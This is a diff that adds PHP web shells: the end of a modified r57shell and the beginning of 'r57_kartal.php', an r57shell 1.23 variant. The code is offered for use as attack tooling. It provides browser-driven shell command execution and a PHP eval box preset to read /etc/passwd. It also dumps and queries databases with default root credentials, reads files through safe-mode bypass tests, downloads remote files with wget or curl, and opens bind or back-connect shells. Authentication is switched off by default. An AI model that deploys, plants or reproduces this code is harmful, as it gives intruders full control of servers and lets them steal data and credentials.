+     if (@mysql_num_rows($res) > 0) {
+     while (($row = @mysql_fetch_assoc($res))) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MySQL server";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+  {
+   if(@mssql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MSSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+     if (@mssql_num_rows($res) > 0) {
+     while (($row = @mssql_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+    }
+   else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+     $sql1  = "# PostgreSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+
+     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+     if (@pg_num_rows($res) > 0) {
+     while (($row = @pg_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+   @pg_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to PostgreSQL server";
+  break;
+  }
+ }
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'jade.va.us.dal.net'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></table>";
+}
+echo $table_up3."<div align=center><font face=Verdana size=-2><b>[ r57shell - Modification By iFX | version ".$version." ]</b></font></div></td></tr></table>".$f;
+?>
\ No newline at end of file
diff --git a/php/r57_kartal.php b/php/r57_kartal.php
new file mode 100644
index 0000000..3b749b7
--- /dev/null
+++ b/php/r57_kartal.php
@@ -0,0 +1,1883 @@
+<?php
+/******************************************************************************************************/
+/* 
+/* 
+/*    ssssssss  pppp  pppp    yyyyyy  yyyyyy    gggg  gggg  rrrr  rrrr  uuuu    uuuu  pppp  pppp  
+/*  ss            pppp    pp    yy      yy    gg    gggg      rrrr        uu      uu    pppp    pp
+/*   ssssss      pp      pp      yy  yy      gg      gg      rr          uu      uu    pp      pp
+/*         ss    pp      pp      yy  yy      gg      gg      rr          uu    uuuu    pp      pp
+/* ssssssss      pppppppp          yy          gggggggg    rrrrrrrr        uuuu  uuuu  pppppppp  
+/*               pp                yy                gg                                pp        
+/*             pppppp          yyyyyy          gggggg                                pppppp      
+/* 
+/*                    kartal_567@hotmail.com[KaRTaL]
+/*
+/*  r57shell.php - &#1089;&#1082;&#1088;&#1080;&#1087;&#1090; &#1085;&#1072; &#1087;&#1093;&#1087; &#1087;&#1086;&#1079;&#1074;&#1086;&#1083;&#1103;&#1102;&#1097;&#1080;&#1081; &#1074;&#1072;&#1084; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1103;&#1090;&#1100; &#1096;&#1077;&#1083;&#1083; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;  &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077; &#1095;&#1077;&#1088;&#1077;&#1079; &#1073;&#1088;&#1072;&#1091;&#1079;&#1077;&#1088;
+/*  &#1042;&#1077;&#1088;&#1089;&#1080;&#1103;: 1.23
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/******************************************************************************************************/
+
+/* ~~~ &#1053;&#1072;&#1089;&#1090;&#1088;&#1086;&#1081;&#1082;&#1080;  ~~~ */
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "q1w2e3r4";
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+
+/* ~~~ &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; ~~~ */
+
+// $auth = 1; - &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; &#1074;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1072;
+// $auth = 0; - &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; &#1074;&#1099;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1072;
+$auth = 0;
+
+// &#1051;&#1086;&#1075;&#1080;&#1085; &#1080; &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072; &#1082; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1091;
+// &#1053;&#1045; &#1047;&#1040;&#1041;&#1059;&#1044;&#1068;&#1058;&#1045; &#1057;&#1052;&#1045;&#1053;&#1048;&#1058;&#1068; &#1055;&#1045;&#1056;&#1045;&#1044; &#1056;&#1040;&#1047;&#1052;&#1045;&#1065;&#1045;&#1053;&#1048;&#1045;&#1052; &#1053;&#1040; &#1057;&#1045;&#1056;&#1042;&#1045;&#1056;&#1045;!!!
+$name='teufel'; // &#1083;&#1086;&#1075;&#1080;&#1085; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103;
+$pass='spyms'; // &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103;
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://www.spygrup.org>www.spygrup.org</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- &#1047;&#1076;&#1088;&#1072;&#1074;&#1089;&#1090;&#1074;&#1091;&#1081;  &#1042;&#1072;&#1089;&#1103; -->
+<html>
+<head>
+<title>shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+  echo $head;
+  switch($_POST['db'])
+  {
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mysql_query($query,$db);
+      $error = @mysql_error($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@mysql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mysql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @mysql_free_result($res);
+      }
+     }
+   	@mysql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mssql_query($query,$db);
+      if (@mssql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mssql_fetch_assoc($res)))
+        {
